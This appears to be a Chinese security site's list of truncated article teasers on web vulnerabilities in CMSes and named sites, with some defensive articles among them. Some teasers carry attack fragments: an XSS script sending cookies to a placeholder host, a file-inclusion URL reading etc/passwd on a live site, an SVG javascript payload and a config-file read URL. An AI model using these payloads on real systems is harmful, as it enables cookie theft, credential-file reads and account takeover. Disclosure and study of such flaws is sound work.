Siteserver CMS SQL注入漏洞一枚(官网BBS中枪) - 网站安关注热度:16

Siteserver CMS 存在SQL注入漏洞，已测试官网论坛和多个互联网实例。漏洞链接：siteserver CMS console_tableMetadata aspx?ENName=cms_ContentTableType=BackgroundContent类型：盲注修复方案：过滤..[详情]

意大利网站后台POST注入记录 - 网站安全 - 自学关注热度:19

信息探测：目标站点：http: www sixxf it服务器IP：192 232 2xx 97（美国）环境平台：PHP服务器系统：Apache这次用网页探测这个站的信息不是很完整，直接奔主题吧，打开网站后台，在登录帐号..[详情]

phpcms前台和(后台低权限)getshell1 - 网站安全 - 自学关注热度:17

1、首先先说前台的吧，估计很多站都开始补了。是针对phpcms 2008的，二次攻击范畴，二次解析getshell。在upload_field php中br $upload_allowext = !empty($C[ 39;upload_allowext 39;]) ? $C[ 39;u..[详情]

xss如何加载远程js的一些tips - 网站安全 - 自学p关注热度:12

在早期 ， 对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话，由于字符串长..[详情]

大汉版通JCMS数据库配置文件读取 - 网站安全 - 自关注热度:17

由于读取xml文件时没有对传进的参数进行过滤，flowcode参数可控，配置文件地址WEB-INF config dbconfig xml，由于控制了文件后缀，只能读取xml文件EXP:http: www iswin org jcms workflow design readxml jsp..[详情]

JSONP安全防范解决方案新思路 - 网站安全 - 自学关注热度:11

jsonp安全性防范，分为以下几点：1、防止callback参数意外截断js代码，特殊字符单引号双引号，换行符均存在风险2、防止callback参数恶意添加标签（如script），造成XSS漏洞3、防止跨域请求..[详情]

齐博CMS存储型XSS可getshell（组合利用） - 网站安全关注热度:17

齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还..[详情]

51CTO存在严重逻辑设计缺陷SHELL主站 - 网站安全关注热度:22

1 信息收集通过分析51cto com的网络结构，发现整体业务由多个分站构成，往往越多的系统会带来越多的安全问题，所以一个一个的摸索。~ linkphone cn 大面积使用PHPCMShttp: publish linkphone c..[详情]

phpcms v9 前台无限制GETSHELL（第一弹） - 网站安全关注热度:22

0x01:介绍PHPCMS V9（后面简称V9）采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP（面向对象）方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展，代码维护..[详情]

派代网主站设计缺陷可删除任意文章 - 网站安全关注热度:10

注册了2个号。在主站可以直接发文章。然后我抓了包http: www paidai com managetopic php?action=user_del_topicboardid=47topicid=202807posterid=669387这是直接get操作 删除文章的。然后另外一个号 发一..[详情]

绕过网易oauth认证的redirect_uri限制劫持帐号token关注热度:95

这里是通过网易帐号登录56网的授权页面:https: api t 163 com oauth2 authorize?client_id=II5coZy8DdAtKt7aredirect_uri=http%3A%2F%2Fapp 56 com%2Fcooperate%2Findex php%3Faction%3DWeibo%26tag%3Dwy%26do..[详情]

如何在网页上隐藏你的Email邮件地址 - 网站安全关注热度:22

你有一个网站，你想把email地址放在上面，让别人可以很方便地联系你，但是你又担心一旦公开邮箱地址，垃圾邮件可能会像洪水一样涌来。你 的担心是对的。现在网上抓取邮件地址的..[详情]

搜狐邮箱存储型XSS（需点击） - 网站安全 - 自学关注热度:32

对用户输入过滤不严，导致可植入恶意代码。payload:svga xlink:href=javascript：alert(document domain) target=_blanktextAAAAA text a svgimage和rect之类的，由于被过滤了width和heig..[详情]

攻击JavaWeb应用[9]-Server篇[2] - 网站安全 - 自学ph关注热度:48

注：在继后门篇后已经有很长时间没更新了，这次一打算写写Server[1]的续集。喜欢B S吗？那我们今天干脆就来写一个简单的Web服务器吧。0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当..[详情]

科普跨站平台XSS SHELL使用方法 - 网站安全 - 自学关注热度:24

理解xss shell是什么之前，让我们一起回顾一下一些基本的xss（跨站脚本），xss是最常见的一个漏洞，存在于今天许多的web应用程序。xss是攻击者试图通过web应用程序执行恶意脚本的技术..[详情]

emlog官方插件导致xss可打管理员cookie - 网站安全关注热度:33

emlog官方的反垃圾评论插件（感觉70%以上的人在用,因为内核代码里没有垃圾评论的处理，要处理垃圾评论只有用插件），未对某处xss进行过滤导致直接打管理员cookie。代码如下：?phpwhi..[详情]

大汉通版jis统一身份认证系统漏洞打包 - 网站安关注热度:40

大汉通版jis统一身份认证系统:在用户修改信息时进行抓包发现POST:http: 10 11 5 201:9080 jis front upduser_do jspCONTENT:c_id=00000vc_loginid=adminvc_password=123456vc_pwd=123456vc_username=系统管..[详情]

也买酒篡改总订单金额便宜买拉菲拉 - 网站安全关注热度:22

也买酒购物车逻辑设计缺陷，商品数量可为负，导致总金额任意篡改漏洞。详细说明：购物车总金额=商品1times;数量+商品2times;数量这里虽然前台限制了数量，但是可以通过篡改post的数据..[详情]

腾讯QQ群无需群主和管理员权限修改群资料(已修关注热度:66

我创建了一个群，在修改好群资料（昵称，简介等等）之后提交的时候进行抓包，然后把post的数据中的群号改成了我加入的一个群，提交完毕，我加入的群资料被改。下图为修改并提交..[详情]

链家旗下自如主站文件包含(读取) - 网站安全 -关注热度:16

http: www ziroom com index php?_a=click_p= etc passwd%00 jpg修复方案：你懂得..[详情]

讨论“get”和“post”安全性 - 网站安全 - 自学关注热度:22

get安全，还是post安全？这或许是大家总结两者必须要分析的内容，因为这涉及到我们将内容从浏览器传送到服务器的安全性，选择不当将会带来巨大的不安全因素，从而可能带来巨大的..[详情]

JBoss远程方法调用漏洞利用详解 - 网站安全 - 自学关注热度:17

早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章，对我等菜鸟来说那边文章看起来还是很吃力的，所以查了查国内外的资料，翻译写了这边文章，记录一下。在JBoss服..[详情]

iGENUS5.0邮件系统的一些漏洞打包（注射及登陆等关注热度:36

没事的时候下载了iGENUS5 0来看了看，时间紧，只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。先说下我使用的版本和环境：整套程序，没有防注入措施，除邮件..[详情]

任我行CRM权限绕过、上传、XSS、SQL注入各种简单关注热度:43

任我行CRM系统的权限绕过、上传、XSS、SQL注入各种简单测试某公司内部网络使用这套系统，第一回见到，看到WEB应用就忍不住手贱~~1、上传个人平台里面的编写内部邮件的时候上传附件..[详情]

C#防SQL注入代码的实现方法 - 网站安全 - 自学ph关注热度:9

对于网站的安全性，是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞，那势必将造成很大的损失。为了提高网站的安全性，首先网站要防注入，最重要的是服务器的安全设..[详情]

神州租车任意用户密码修改 - 网站安全 - 自学p关注热度:46

问题出在神州租车的app端，校验机制设计的太脆弱~下面是修改用户个人资料的请求数据包，数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值，又没有其他的..[详情]

安全狗高权限时的提权方法 - 网站安全 - 自学p关注热度:20

当权限是administrator时可以直接上远控并且成功执行exe恶意文件远控上线有的管理员以为安装了安全狗就万无一失，但是有了键盘记录这不等于像我们拿到权限后要做的事情一样么。安全..[详情]

iSiteCMS发布安全补丁后仍然有几处注射漏洞源码详关注热度:16

iSiteCMS 之前有过一个后台登陆时的注射，不过后来修复了，但是还有几处注射分布在XX模块以及XXX模块里本文对源代码进行了详细的分析源码分析请见详细说明，实站演示请见漏洞证明..[详情]

phpcms v9后台远程代码执行漏洞（第三弹） - 网站关注热度:27

前台了来了几期，干脆来个后台代码执行。记住。。。这是后台2次SQL执行漏洞。。。看分析。。。phpcms 官方给力点，到时候俺给你还来几发 在phpcms modules dbsource data php中add 方法方法很..[详情]

被小伙伴们蠢哭了的那些事儿：找回密码篇 - 网关注热度:23

郑昀 创建于2014-01-12；最后更新于2014-01-13 找回密码功能是漏洞传统重灾区，下面列出两个经典错误点，请引以为戒吧Web开发工程师们！Web安全：一）以为用户不会抓包不会看源码不会分..[详情]